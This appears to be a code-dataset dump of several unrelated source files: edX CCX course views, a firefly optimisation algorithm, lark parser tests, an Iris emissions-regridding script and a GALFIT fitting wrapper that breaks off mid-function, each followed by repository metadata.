                    start = get_date(ccx, child, 'start', node)
visited = {
'location': str(child.location),
'display_name': child.display_name,
'category': child.category,
'start': start,
'due': due,
'hidden': hidden,
}
else:
visited = {
'location': str(child.location),
'display_name': child.display_name,
'category': child.category,
'start': start,
'hidden': hidden,
}
if depth < 3:
children = tuple(visit(child, depth + 1))
if children:
visited['children'] = children
yield visited
else:
yield visited
with disable_overrides():
return tuple(visit(course))
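# Illustrative shape of the value returned by get_ccx_schedule (values are
# made up; the keys follow the visit() function above):
#   ({'location': 'block-v1:...', 'display_name': 'Week 1',
#     'category': 'chapter', 'start': '2016-01-01 00:00', 'hidden': False,
#     'children': ({'location': 'block-v1:...', 'display_name': 'Lesson 1',
#                   'category': 'sequential', 'start': '2016-01-01 00:00',
#                   'due': '2016-01-08 00:00', 'hidden': False,
#                   'children': (...,)},)},)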
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@coach_dashboard
def ccx_schedule(request, course, ccx=None): # pylint: disable=unused-argument
"""
get json representation of ccx schedule
"""
if not ccx:
raise Http404
schedule = get_ccx_schedule(course, ccx)
json_schedule = json.dumps(schedule, indent=4)
return HttpResponse(json_schedule, content_type='application/json')
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@coach_dashboard
def ccx_students_management(request, course, ccx=None):
"""
Manage the enrollment of the students in a CCX
"""
if not ccx:
raise Http404
action, identifiers = get_enrollment_action_and_identifiers(request)
email_students = 'email-students' in request.POST
course_key = CCXLocator.from_course_locator(course.id, unicode(ccx.id))
email_params = get_email_params(course, auto_enroll=True, course_key=course_key, display_name=ccx.display_name)
errors = ccx_students_enrolling_center(action, identifiers, email_students, course_key, email_params, ccx.coach)
for error_message in errors:
messages.error(request, error_message)
url = reverse('ccx_coach_dashboard', kwargs={'course_id': course_key})
return redirect(url)
# Grades can potentially be written - if so, let grading manage the transaction.
@transaction.non_atomic_requests
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@coach_dashboard
def ccx_gradebook(request, course, ccx=None):
"""
Show the gradebook for this CCX.
"""
if not ccx:
raise Http404
ccx_key = CCXLocator.from_course_locator(course.id, unicode(ccx.id))
with ccx_course(ccx_key) as course:
student_info, page = get_grade_book_page(request, course, course_key=ccx_key)
return render_to_response('courseware/gradebook.html', {
'page': page,
'page_url': reverse('ccx_gradebook', kwargs={'course_id': ccx_key}),
'students': student_info,
'course': course,
'course_id': course.id,
'staff_access': request.user.is_staff,
'ordered_grades': sorted(
course.grade_cutoffs.items(), key=lambda i: i[1], reverse=True),
})
# Grades can potentially be written - if so, let grading manage the transaction.
@transaction.non_atomic_requests
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@coach_dashboard
def ccx_grades_csv(request, course, ccx=None):
"""
Download grades as CSV.
"""
if not ccx:
raise Http404
ccx_key = CCXLocator.from_course_locator(course.id, unicode(ccx.id))
with ccx_course(ccx_key) as course:
enrolled_students = User.objects.filter(
courseenrollment__course_id=ccx_key,
courseenrollment__is_active=1
).order_by('username').select_related("profile")
grades = CourseGradeFactory().iter(enrolled_students, course)
header = None
rows = []
for student, course_grade, __ in grades:
if course_grade:
# We were able to successfully grade this student for this
# course.
if not header:
# Encode the header row in utf-8 encoding in case there are
# unicode characters
header = [section['label'].encode('utf-8')
for section in course_grade.summary[u'section_breakdown']]
rows.append(["id", "email", "username", "grade"] + header)
percents = {
section['label']: section.get('percent', 0.0)
for section in course_grade.summary[u'section_breakdown']
if 'label' in section
}
row_percents = [percents.get(label, 0.0) for label in header]
rows.append([student.id, student.email, student.username,
course_grade.percent] + row_percents)
buf = StringIO()
writer = csv.writer(buf)
for row in rows:
writer.writerow(row)
response = HttpResponse(buf.getvalue(), content_type='text/csv')
response['Content-Disposition'] = 'attachment'
return response
| procangroup/edx-platform | lms/djangoapps/ccx/views.py | Python | agpl-3.0 | 21,447 | ["VisIt"] | 11c50d730555192f1bf8f8b27762954eafb54488711e6c461a07c7f007ef680f |
'''
Created on 2015/03/13
@author: admin
'''
import multiprocessing as mp
import numpy as np
class Firefly:
    '''
    Firefly Algorithm
    '''
    def __init__(self,ite,pop=20,alpha=0.25,beta=0.5, gamma=1.0, variant='sfa',torus=True,best=None,ftarget=-np.inf,threads=1):
        '''
        The default values are stable and usually fine.
        Set the maximum number of iterations (ite) and the population size
        (pop) based on the time you have.
        Set threads > 1 for multiprocessing; however, creating worker
        processes has an up-front cost, so it is not recommended for cheap
        objective functions.
        Threading is not supported for this algorithm at the moment.
        '''
self.ite = ite
self.pop = pop
self.beta = beta
self.alpha = alpha
self.gamma = gamma
self.variant = variant
self.torus = torus
self._best = best
self._ftarget = ftarget
self.threads = threads
def _init(self,dim,E):
self.pbests = [ np.random.rand(dim) for x in range(self.pop) ]
self.currents = [ np.random.rand(dim) for x in range(self.pop) ]
        if self._best is None:
self._best = np.random.rand(dim)
self._bestScore = np.inf
else:
self._bestScore = E(np.array(self._best))
self._best = np.array(self._best)
self.pbestScores = [ np.inf for x in range(self.pop) ]
self.currentScores = [ np.inf for x in range(self.pop) ]
self._fcall = 0
self.changed = [ True for x in range(self.pop) ]
def _calcObj(self,E):
        if self.threads == 1:
for i in range(self.pop):
if self.changed[i]:
self.changed[i] = False
if self.pop*self.ite <= self._fcall:
break
self.currentScores[i] = E(self.currents[i])
self._fcall += 1
else:
args = [[self.currents[k]] for k in range(self.pop)]
with mp.Pool(self.threads) as p:#,maxtasksperchild=1)
results = p.starmap(E, args)
self.currentScores = results
self._fcall += self.pop
def _rewriteBests(self,E):
for i in range(self.pop):
if self.currentScores[i] <= self.pbestScores[i]:
self.pbests[i] = self.currents[i].copy()
self.pbestScores[i] = self.currentScores[i]
if self.pbestScores[i] <= self._bestScore:
self._best = self.pbests[i].copy()
self._bestScore = self.pbestScores[i]
def run(self,E):
        '''
        Make sure that you rescale the objective function's domain to
        0 < x < 1, since the initial points are uniformly distributed within
        that range.
        '''
dim = E.dim()
self._init(dim,E)
self._calcObj(E)
self._rewriteBests(E)
cnt = 0
while self._fcall < self.pop*self.ite:
a = cnt%self.pop
b = int(cnt/self.pop)%self.pop
a, b = b, a
t = self._fcall/float(self.ite*self.pop)
beta = 0.267#self.beta
alpha = self.alpha*np.exp(-5.0*t)
if self.currentScores[b] <= self.currentScores[a]:
#beta = self.beta
#alpha = self.alpha
#alpha = 0.5-0.49*t
#beta = self.beta
#lambd = self.alpha
r = np.linalg.norm(self.currents[b]-self.currents[a])
gamma = self.gamma/np.sqrt(dim)
inside = -(gamma*(r**2.0)/float(dim))*10
rg = np.linalg.norm(self._best-self.currents[a])
inside2 = -(gamma*(rg**2.0)/float(dim))*10
#print(inside,inside2,np.exp(inside),np.exp(inside2))
if 'sfa' == self.variant:
#alpha = 0.1
self.currents[a] = self.currents[a]+beta*np.exp(inside)*(self.currents[b]-self.currents[a]) + alpha*(np.random.randn(dim))
elif 'mfa1' == self.variant:
self.currents[a] = self.currents[a]+beta*np.exp(inside)*(self.currents[b]-self.currents[a]) +beta*np.exp(inside2)*(self._best-self.currents[a]) + alpha*(np.random.rand(dim)-0.5)
elif 'nmfa' == self.variant:
lambd = 2.5
self.currents[a] = self.currents[a]+beta*np.exp(inside)*(self.currents[b]-self.currents[a]) +beta*np.exp(inside2)*(self._best-self.currents[a]) + lambd*(np.random.rand(dim)-0.5)*(self.currents[a]-self._best)+alpha*(np.random.rand(dim)-0.5)
if self.torus:
i = a
for j in range(dim):
self.currents[i][j] -= int(self.currents[i][j])
if self.currents[i][j] < 0:
self.currents[i][j] += 1
self.currentScores[a] = E(self.currents[a])
self._fcall += 1
if self.currentScores[a] <= self.pbestScores[a]:
self.pbests[a] = self.currents[a].copy()
self.pbestScores[a] = self.currentScores[a]
if self.pbestScores[a] <= self._bestScore:
self._best = self.pbests[a].copy()
self._bestScore = self.pbestScores[a]
if self._bestScore <= self._ftarget:
break
cnt += 1
return self._best
def name(self):
return self.__class__.__name__
class MathFly(Firefly):
    '''
    Firefly Algorithm variant with a simplified attraction rule.
    '''
    def __init__(self,ite,pop=20,alpha=7.72,beta=1.0,torus=True,best=None,ftarget=-np.inf,threads=1):
        '''
        The default values are stable and usually fine.
        Set the maximum number of iterations (ite) and the population size
        (pop) based on the time you have.
        Set threads > 1 for multiprocessing; however, creating worker
        processes has an up-front cost, so it is not recommended for cheap
        objective functions.
        '''
self.ite = ite
self.pop = pop
self.beta = beta
self.alpha = alpha
self.torus = torus
self._best = best
self._ftarget = ftarget
self.threads = threads
def run(self,E):
        '''
        Make sure that you rescale the objective function's domain to
        0 < x < 1, since the initial points are uniformly distributed within
        that range.
        '''
dim = E.dim()
self._init(dim,E)
self._calcObj(E)
while self._fcall < self.pop*self.ite:
self._rewriteBests(E)
if self._bestScore < self._ftarget:
break
#print("%s, %s, %s"%(k,self.gbestScore,list(self.gbest)))
#print("%s, %s, %s"%(k,self.currents[0][0],self.vs[0][0]))
self._moveToNext(dim)
self._calcObj(E)
self._rewriteBests(E)
return self._best
def _init(self,dim,E):
self.pbests = [ np.random.rand(dim) for x in range(self.pop) ]
self.currents = [ np.random.rand(dim) for x in range(self.pop) ]
        if self._best is None:
self._best = np.random.rand(dim)
self._bestScore = np.inf
else:
self._bestScore = E(np.array(self._best))
self._best = np.array(self._best)
self.pbestScores = [ np.inf for x in range(self.pop) ]
self.currentScores = [ np.inf for x in range(self.pop) ]
self._fcall = 0
self.changed = [ True for x in range(self.pop) ]
def _rewriteBests(self,E):
for i in range(self.pop):
if self.currentScores[i] <= self.pbestScores[i]:
self.pbests[i] = self.currents[i].copy()
self.pbestScores[i] = self.currentScores[i]
if self.pbestScores[i] <= self._bestScore:
self._best = self.pbests[i].copy()
self._bestScore = self.pbestScores[i]
#print("best score = %f"%self.gbestScore)
#print("best = %s"%self.gbest)
#if hasattr(E,"cross"):
# print(E.cross(self.gbest))
def _calcObj(self,E):
        if self.threads == 1:
for i in range(self.pop):
if self.changed[i]:
self.changed[i] = False
if self.pop*self.ite <= self._fcall:
break
self.currentScores[i] = E(self.currents[i])
self._fcall += 1
else:
args = [[self.currents[k]] for k in range(self.pop)]
with mp.Pool(self.threads) as p:#,maxtasksperchild=1)
results = p.starmap(E, args)
self.currentScores = results
self._fcall += self.pop
def _moveToNext(self,dim):
t = self._fcall/float(self.ite*self.pop)
for i in range(self.pop):
q1 = np.random.randint(0,self.pop)
while self.pbestScores[i] < self.pbestScores[q1]:
q1 = np.random.randint(0,self.pop)
if self.pbestScores[q1] <= self.pbestScores[i]:
self.changed[i] = True
self.currents[i] = self.currents[i]+self.beta*(self.pbests[q1]-self.currents[i]) + 0.254*np.exp(-self.alpha*t)*np.random.randn(dim)
if self.torus:
for j in range(dim):
self.currents[i][j] -= int(self.currents[i][j])
if self.currents[i][j] < 0:
self.currents[i][j] += 1
def name(self):
return self.__class__.__name__
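# Minimal usage sketch (an assumption, not part of the original module):
# objectives must be callable on a numpy vector and expose dim(), as used by
# run() above; the search space is the unit hypercube, so rescale your domain
# to 0 < x < 1.
if __name__ == '__main__':
    class Sphere:
        def dim(self):
            return 5
        def __call__(self, x):
            # shifted sphere function; minimum of 0 at x = [0.5, ..., 0.5]
            return float(np.sum((x - 0.5)**2))
    fa = Firefly(ite=100, pop=20)
    print(fa.name(), fa.run(Sphere()))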
| kanemasa1987/Meatpie | optlib/firefly.py | Python | mit | 9,673 | ["Firefly"] | d81f5fbb410063348f86f2c3d15e7218ffbb1480a7c0c7514539280678a7d011 |
from __future__ import absolute_import
import unittest
from lark import Lark
from lark.lexer import Token
from lark.tree import Tree
from lark.visitors import Visitor, Transformer, Discard
from lark.parsers.earley_forest import TreeForestTransformer, handles_ambiguity
class TestTreeForestTransformer(unittest.TestCase):
grammar = """
start: ab bc cd
!ab: "A" "B"?
!bc: "B"? "C"?
!cd: "C"? "D"
"""
parser = Lark(grammar, parser='earley', ambiguity='forest')
forest = parser.parse("ABCD")
def test_identity_resolve_ambiguity(self):
l = Lark(self.grammar, parser='earley', ambiguity='resolve')
tree1 = l.parse("ABCD")
tree2 = TreeForestTransformer(resolve_ambiguity=True).transform(self.forest)
self.assertEqual(tree1, tree2)
def test_identity_explicit_ambiguity(self):
l = Lark(self.grammar, parser='earley', ambiguity='explicit')
tree1 = l.parse("ABCD")
tree2 = TreeForestTransformer(resolve_ambiguity=False).transform(self.forest)
self.assertEqual(tree1, tree2)
def test_tree_class(self):
class CustomTree(Tree):
pass
class TreeChecker(Visitor):
def __default__(self, tree):
assert isinstance(tree, CustomTree)
tree = TreeForestTransformer(resolve_ambiguity=False, tree_class=CustomTree).transform(self.forest)
TreeChecker().visit(tree)
def test_token_calls(self):
visited = [False] * 4
class CustomTransformer(TreeForestTransformer):
def A(self, node):
assert node.type == 'A'
visited[0] = True
def B(self, node):
assert node.type == 'B'
visited[1] = True
def C(self, node):
assert node.type == 'C'
visited[2] = True
def D(self, node):
assert node.type == 'D'
visited[3] = True
tree = CustomTransformer(resolve_ambiguity=False).transform(self.forest)
assert visited == [True] * 4
def test_default_token(self):
token_count = [0]
class CustomTransformer(TreeForestTransformer):
def __default_token__(self, node):
token_count[0] += 1
assert isinstance(node, Token)
tree = CustomTransformer(resolve_ambiguity=True).transform(self.forest)
self.assertEqual(token_count[0], 4)
def test_rule_calls(self):
visited_start = [False]
visited_ab = [False]
visited_bc = [False]
visited_cd = [False]
class CustomTransformer(TreeForestTransformer):
def start(self, data):
visited_start[0] = True
def ab(self, data):
visited_ab[0] = True
def bc(self, data):
visited_bc[0] = True
def cd(self, data):
visited_cd[0] = True
tree = CustomTransformer(resolve_ambiguity=False).transform(self.forest)
self.assertTrue(visited_start[0])
self.assertTrue(visited_ab[0])
self.assertTrue(visited_bc[0])
self.assertTrue(visited_cd[0])
def test_default_rule(self):
rule_count = [0]
class CustomTransformer(TreeForestTransformer):
def __default__(self, name, data):
rule_count[0] += 1
tree = CustomTransformer(resolve_ambiguity=True).transform(self.forest)
self.assertEqual(rule_count[0], 4)
def test_default_ambig(self):
ambig_count = [0]
class CustomTransformer(TreeForestTransformer):
def __default_ambig__(self, name, data):
if len(data) > 1:
ambig_count[0] += 1
tree = CustomTransformer(resolve_ambiguity=False).transform(self.forest)
self.assertEqual(ambig_count[0], 1)
def test_handles_ambiguity(self):
class CustomTransformer(TreeForestTransformer):
@handles_ambiguity
def start(self, data):
assert isinstance(data, list)
assert len(data) == 4
for tree in data:
assert tree.data == 'start'
return 'handled'
@handles_ambiguity
def ab(self, data):
assert isinstance(data, list)
assert len(data) == 1
assert data[0].data == 'ab'
tree = CustomTransformer(resolve_ambiguity=False).transform(self.forest)
self.assertEqual(tree, 'handled')
def test_discard(self):
class CustomTransformer(TreeForestTransformer):
def bc(self, data):
return Discard
def D(self, node):
return Discard
class TreeChecker(Transformer):
def bc(self, children):
assert False
def D(self, token):
assert False
tree = CustomTransformer(resolve_ambiguity=False).transform(self.forest)
TreeChecker(visit_tokens=True).transform(tree)
def test_aliases(self):
visited_ambiguous = [False]
visited_full = [False]
class CustomTransformer(TreeForestTransformer):
@handles_ambiguity
def start(self, data):
for tree in data:
assert tree.data == 'ambiguous' or tree.data == 'full'
def ambiguous(self, data):
visited_ambiguous[0] = True
assert len(data) == 3
assert data[0].data == 'ab'
assert data[1].data == 'bc'
assert data[2].data == 'cd'
return self.tree_class('ambiguous', data)
def full(self, data):
visited_full[0] = True
assert len(data) == 1
assert data[0].data == 'abcd'
return self.tree_class('full', data)
grammar = """
start: ab bc cd -> ambiguous
| abcd -> full
!ab: "A" "B"?
!bc: "B"? "C"?
!cd: "C"? "D"
!abcd: "ABCD"
"""
l = Lark(grammar, parser='earley', ambiguity='forest')
forest = l.parse('ABCD')
tree = CustomTransformer(resolve_ambiguity=False).transform(forest)
self.assertTrue(visited_ambiguous[0])
self.assertTrue(visited_full[0])
def test_transformation(self):
class CustomTransformer(TreeForestTransformer):
def __default__(self, name, data):
result = []
for item in data:
if isinstance(item, list):
result += item
else:
result.append(item)
return result
def __default_token__(self, node):
return node.lower()
def __default_ambig__(self, name, data):
return data[0]
result = CustomTransformer(resolve_ambiguity=False).transform(self.forest)
expected = ['a', 'b', 'c', 'd']
self.assertEqual(result, expected)
if __name__ == '__main__':
unittest.main()
| lark-parser/lark | tests/test_tree_forest_transformer.py | Python | mit | 7,156 | ["VisIt"] | da3b3114f76436a6fceca507db143785023026cd3c191a7b2a68dd128f96d993 |
#!/usr/bin/env python
##############################################################################################
#
#
# regrid_emissions_N96e.py
#
#
# Requirements:
# Iris 1.10, cf_units, numpy
#
#
# This Python script has been written by N.L. Abraham as part of the UKCA Tutorials:
# http://www.ukca.ac.uk/wiki/index.php/UKCA_Chemistry_and_Aerosol_Tutorials_at_vn10.4
#
# Copyright (C) 2015 University of Cambridge
#
# This is free software: you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# It is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
# PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details.
#
# You find a copy of the GNU Lesser General Public License at <http://www.gnu.org/licenses/>.
#
# Written by N. Luke Abraham 2016-10-20 <nla27@cam.ac.uk>
#
#
##############################################################################################
# preamble
import os
import time
import iris
import cf_units
import numpy
# --- CHANGE THINGS BELOW THIS LINE TO WORK WITH YOUR FILES ETC. ---
# name of file containing an ENDGame grid, e.g. your model output
# NOTE: all the fields in the file should be on the same horizontal
# grid, as the field used MAY NOT be the first in order of STASH
grid_file='/group_workspaces/jasmin2/ukca/vol1/mkoehler/um/archer/ag542/apm.pp/ag542a.pm1988dec'
#
# name of emissions file
emissions_file='/group_workspaces/jasmin2/ukca/vol1/mkoehler/emissions/combined_1960/0.5x0.5/combined_sources_C2H6_lumped_1960_360d.nc'
#
# STASH code emissions are associated with
# 301-320: surface
# m01s00i305: C2H6 surface emissions
#
# 321-340: full atmosphere
#
stash='m01s00i305'
# --- BELOW THIS LINE, NOTHING SHOULD NEED TO BE CHANGED ---
species_name='C2H6'
# this is the grid we want to regrid to, e.g. N96 ENDGame
grd=iris.load(grid_file)[0]
grd.coord(axis='x').guess_bounds()
grd.coord(axis='y').guess_bounds()
# This is the original data
ems=iris.load_cube(emissions_file)
# make intersection between 0 and 360 longitude to ensure that
# the data is regridded correctly
nems = ems.intersection(longitude=(0, 360))
# make sure that we use the same coordinate system, otherwise regrid won't work
nems.coord(axis='x').coord_system=grd.coord_system()
nems.coord(axis='y').coord_system=grd.coord_system()
# now guess the bounds of the new grid prior to regridding
nems.coord(axis='x').guess_bounds()
nems.coord(axis='y').guess_bounds()
# now regrid
ocube=nems.regrid(grd,iris.analysis.AreaWeighted())
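# optional sanity check (illustrative): AreaWeighted regridding should
# approximately conserve the area-integrated emission total
#from iris.analysis.cartography import area_weights
#print('global total before: ', (nems.data*area_weights(nems)).sum())
#print('global total after:  ', (ocube.data*area_weights(ocube)).sum())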
# now add correct attributes and names to netCDF file
ocube.var_name='emissions_'+str.strip(species_name)
ocube.long_name=str.strip(species_name)+' surf emissions'
ocube.units=cf_units.Unit('kg m-2 s-1')
ocube.attributes['vertical_scaling']='surface'
ocube.attributes['um_stash_source']=stash
ocube.attributes['tracer_name']=str.strip(species_name)
# global attributes, so don't set in local_keys
# NOTE: all these should be strings, including the numbers!
# basic emissions type
ocube.attributes['lumped_species']='C2H6, C2H4 and C2H2' # lumping of species
ocube.attributes['emission_type']='2' # periodic time series
ocube.attributes['update_type']='2' # same as above
ocube.attributes['update_freq_in_hours']='120' # i.e. 5 days
ocube.attributes['um_version']='10.6' # UM version
ocube.attributes['source']='combined_sources_C2H6_lumped_1960_360d.nc'
ocube.attributes['title']='Monthly surface emissions of ethane, lumped with ethene and ethyne, for 1960'
ocube.attributes['File_version']='v1'
ocube.attributes['File_creation_date']=time.ctime(time.time())
ocube.attributes['grid']='regular 1.875 x 1.25 degree longitude-latitude grid (N96e)'
ocube.attributes['history']=time.ctime(time.time())+': '+__file__+' \n'+ocube.attributes['history']
ocube.attributes['institution']='Centre for Atmospheric Science, Department of Chemistry, University of Cambridge, U.K.'
ocube.attributes['reference']='Granier et al., Clim. Change, 2011; Lamarque et al., Atmos. Chem. Phys., 2010'
del ocube.attributes['NCO']
del ocube.attributes['file_creation_date']
del ocube.attributes['description']
# rename and set time coord - mid-month points for the 12 months of 1960
# (360-day calendar); this bit is annoyingly fiddly
ocube.coord(axis='t').var_name='time'
ocube.coord(axis='t').standard_name='time'
ocube.coords(axis='t')[0].units=cf_units.Unit('days since 1960-01-01 00:00:00', calendar='360_day')
ocube.coord(axis='t').points=numpy.array([15, 45, 75, 105, 135, 165, 195, 225, 255, 285, 315, 345])
# make z-direction.
zdims=iris.coords.DimCoord(numpy.array([0]),standard_name = 'model_level_number',
units='1',attributes={'positive':'up'})
ocube.add_aux_coord(zdims)
ocube=iris.util.new_axis(ocube, zdims)
# now transpose cube to put Z 2nd
ocube.transpose([1,0,2,3])
# make coordinates 64-bit
ocube.coord(axis='x').points=ocube.coord(axis='x').points.astype(dtype='float64')
ocube.coord(axis='y').points=ocube.coord(axis='y').points.astype(dtype='float64')
#ocube.coord(axis='z').points=ocube.coord(axis='z').points.astype(dtype='float64') # integer
ocube.coord(axis='t').points=ocube.coord(axis='t').points.astype(dtype='float64')
# for some reason, longitude_bounds are double, but latitude_bounds are float
ocube.coord('latitude').bounds=ocube.coord('latitude').bounds.astype(dtype='float64')
# add forecast_period & forecast_reference_time
# forecast_reference_time
frt=numpy.array([15, 45, 75, 105, 135, 165, 195, 225, 255, 285, 315, 345], dtype='float64')
frt_dims=iris.coords.AuxCoord(frt,standard_name = 'forecast_reference_time',
units=cf_units.Unit('days since 1960-01-01 00:00:00', calendar='360_day'))
ocube.add_aux_coord(frt_dims,data_dims=0)
ocube.coord('forecast_reference_time').guess_bounds()
# forecast_period
fp=numpy.array([-360],dtype='float64')
fp_dims=iris.coords.AuxCoord(fp,standard_name = 'forecast_period',
units=cf_units.Unit('hours'),bounds=numpy.array([-720,0],dtype='float64'))
ocube.add_aux_coord(fp_dims,data_dims=None)
# add-in cell_methods
ocube.cell_methods = [iris.coords.CellMethod('mean', 'time')]
# set _FillValue
fillval=1e+20
ocube.data = numpy.ma.array(data=ocube.data, fill_value=fillval, dtype='float32')
# output file name, based on species
outpath='ukca_emiss_'+species_name+'.nc'
# we don't want time to be an unlimited (concatenatable) dimension, as this is a periodic emissions file
iris.FUTURE.netcdf_no_unlimited=True
# annoying hack to set a missing_value attribute as well as a _FillValue attribute
dict.__setitem__(ocube.attributes, 'missing_value', fillval)
# now write-out to netCDF
saver = iris.fileformats.netcdf.Saver(filename=outpath, netcdf_format='NETCDF3_CLASSIC')
saver.update_global_attributes(Conventions=iris.fileformats.netcdf.CF_CONVENTIONS_VERSION)
saver.write(ocube, local_keys=['vertical_scaling', 'missing_value','um_stash_source','tracer_name','lumped_species'])
# end of script
| acsis-project/emissions | emissions/python/periodic_1960/regrid_C2H6_emissions_n96e_360d_1960.py | Python | gpl-3.0 | 7,151 | ["NetCDF"] | e9146455bfc53144f62cbec0e0e23d508978ddf5f5c469aa808cb6214f3d41d4 |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 14 16:21:46 2016
Defines a function to call Galfit for a single FITS image Sersic optimisation.
Also a function to calculate chi-squared for a given Sersic parameterisation.
@author: rs548
"""
from __future__ import division, print_function
import subprocess
#import astropy
from astropy.io import fits
from os import listdir
from os import getcwd
from os import rename
from os import chdir
from os import remove
from textwrap import dedent
import time
trashDir = '/Users/rs548/Documents/Science/PeteHurley/TRASH/'
#chdir(workDir + 'TRASH/')
wkdir = getcwd()
#print('at galfit import wkdir is' + wkdir)
def optimise(fitsfile, folder, source, field=None,**kwargs):
#print('galfit.py has been called')
    if field is None:
print('no field assigned for Galfit run, assuming SDSS')
field = 'SDSS'
#field = 'SDSS'
if field == 'UltraVISTA':
plateScale = '0.14997825'
magphotzero = '30.0'
inputDir = '/Users/rs548/Documents/Science/PeteHurley/UV/'
outputDir = '/Users/rs548/Documents/Science/PeteHurley/UVG/'
elif field == 'SDSS':
plateScale = '0.396127'
# SDSS from http://classic.sdss.org/dr7/algorithms/fluxcal.html
#magphotzero = 24.63 #u band
magphotzero = '25.11' #g band
#magphotzero = 24.80 #r band
#magphotzero = 24.36 #i band
#magphotzero = 22.83 #z band
inputDir = '/Users/rs548/Documents/Science/PeteHurley/SDSS/'
outputDir = '/Users/rs548/Documents/Science/PeteHurley/SG/'
filename=str(fitsfile)
fileRoot = filename[:-5]
restart = False
rGuess = source['expRad_r_sdss'] / float(plateScale)
axisRatioGuess = source['expAB_r_sdss']
method = 0
psf = 'none' #folder + 'PSF-g.fits' #'PSF-g.fits' psfNOTOK.fits
inputText = """
===============================================================================
# IMAGE and GALFIT CONTROL PARAMETERS
A) {folder}{filename} # Input data image (FITS file)
B) {outputDir}{fileRoot}-output.fits # Output data image block
C) none # Sigma image name (made from data if blank or "none")
D) {psf} # # Input PSF image and (optional) diffusion kernel
E) 1 # PSF fine sampling factor relative to data
F) none # Bad pixel mask (FITS image or ASCII coord list)
G) /Users/rs548/Documents/Science/PeteHurley/12xyequal.constraints # File with parameter constraints (ASCII file)
H) 1 150 1 150 # Image region to fit (xmin xmax ymin ymax)
I) 100 100 # Size of the convolution box (x y)
J) {magphotzero} # Magnitude photometric zeropoint (UltraVISTA = 30.0) ???
K) {plateScale} {plateScale} # Plate scale (dx dy) [arcsec per pixel] (UltraVISTA= 0.14997825 0.14997825 )
O) regular # Display type (regular, curses, both)
P) {method} # Choose: 0=optimize, 1=model, 2=imgblock, 3=subcomps
# INITIAL FITTING PARAMETERS
#
# For object type, the allowed functions are:
# nuker, sersic, expdisk, devauc, king, psf, gaussian, moffat,
# ferrer, powsersic, sky, and isophote.
#
# Hidden parameters will only appear when they're specified:
# C0 (diskyness/boxyness),
# Fn (n=integer, Azimuthal Fourier Modes),
# R0-R10 (PA rotation, for creating spiral structures).
#
# -----------------------------------------------------------------------------
# par) par value(s) fit toggle(s) # parameter description
# -----------------------------------------------------------------------------
# Object number: 1
0) sersic # object type
1) 75.0 75.0 1 1 # position x, y
3) 20.0 1 # Integrated magnitude
4) 4 1 # R_e (half-light radius) [pix]
5) 4.0 1 # Sersic index n (de Vaucouleurs n=4)
6) 0.0000 0 # -----
7) 0.0000 0 # -----
8) 0.0000 0 # -----
9) 1 1 # axis ratio (b/a)
10) 0.0 1 # position angle (PA) [deg: Up=0, Left=90]
Z) 0 # output option (0 = resid., 1 = Don't subtract)
# Object number: 2
0) expdisk # object type
1) 75.0 75.0 1 1 # position x, y
3) 17.0 1 # Integrated magnitude
4) {rGuess} 1 # R_s [pix]
9) {axisRatioGuess} 1 # axis ratio (b/a)
10) 0.0 1 # position angle (PA) [deg: Up=0, Left=90]
Z) 0 # output option (0 = resid., 1 = Don't subtract)
# Object number: 3
0) sky # object type
1) 0.001 1 # sky background at center of fitting region [ADUs]
2) 0.0000 0 # dsky/dx (sky gradient in x)
3) 0.0000 0 # dsky/dy (sky gradient in y)
Z) 0 # output option (0 = resid., 1 = Don't subtract)
================================================================================
""".format(**vars())
inputFile = open(outputDir + fileRoot + '.feedme', "w")
inputFile.write(inputText)
inputFile.close()
log_file = open(outputDir + fileRoot + '-log.txt', 'a')
#print('at galfit run wkdir is' + wkdir)
if restart:
print('restarting with last run parameters')
else:
#print( listdir(trashDir))
for restartFile in listdir(trashDir):
if restartFile[0:7] == 'galfit.':
rename(trashDir + restartFile, trashDir + 'wasnotused' + restartFile)
#print(trashDir + restartFile, trashDir + 'wasnotused' + restartFile)
#'-imax', '99',
print('Galfit.py is about to call galfit on ' + filename)
#print(inputText)
t0 = time.time()
subprocess.call(['/usr/local/bin/galfit',
outputDir
+ fileRoot + '.feedme'],
stdout=log_file)
trun = time.time() - t0
print('Galfit took ', round(trun,1), 's to run.')
log_file.close()
#fitsOutput = fits.open('imgblock.fits')
#fitsOutput.close()
#chiSq = fitsOutput[2].header['CHISQ']
#print('ChiSq is ',chiSq )
###############################PROFIT INPUT TO COPY##########################
# profit_model = {'width': data.image.shape[1],
# 'height': data.image.shape[0],
# 'magzero': data.magzero,
# 'psf': data.psf,
# 'profiles': {'sersic': sparams}
# }
# print(profit_model)
# if use_mask:
# profit_model['calcmask'] = data.calcregion
# return allparams, np.array(pyprofit.make_model(profit_model))
#get chi squared for use by mcmc code
def chisquared(image,model,*args,**kwargs):
"""
    This function should take an input that pyprofit can take and return the
    same object that pyprofit would return. For rigour, any calling code
    should therefore be runnable with both pyprofit and Galfit, which allows
    direct comparison and helps with publishing, given Galfit's long standing.
"""
temp = 'temp/'
folder = '/Users/rs548/Documents/Science/Blended/'
imageName = 'tempOut'
#Call galfit for param values model only
nObjects = len(model)
allObjects = ''
n = 1
for component in model:
if component[0] == 'sersic':
thisObject = """
# Object number: {n}
0) {component[0]} # object type
1) {component[1]} {component[2]} 1 1 # position x, y
3) {component[3]} 1 # Integrated magnitude
4) {component[4]} 1 # R_e (half-light radius) [pix]
5) {component[5]} 1 # Sersic index n (de Vaucouleurs n=4)
6) 0.0000 0 # -----
7) 0.0000 0 # -----
8) 0.0000 0 # -----
9) {component[9]} 1 # axis ratio (b/a)
10) {component[10]} 1 # position angle (PA) [deg: Up=0, Left=90]
Z) 0 # output option (0 = resid., 1 = Don't subtract)
""".format(**vars())
elif component[0] == 'sky':
thisObject = """
# Object number: {n}
0) {component[0]} # object type
1) {component[1]} 1 # Sky background
2) 0.000e+00 0 # dsky/dx (sky gradient in x)
3) 0.000e+00 0 # dsky/dy (sky gradient in y)
Z) 0 # output option (0 = resid., 1 = Don't subtract)
""".format(**vars())
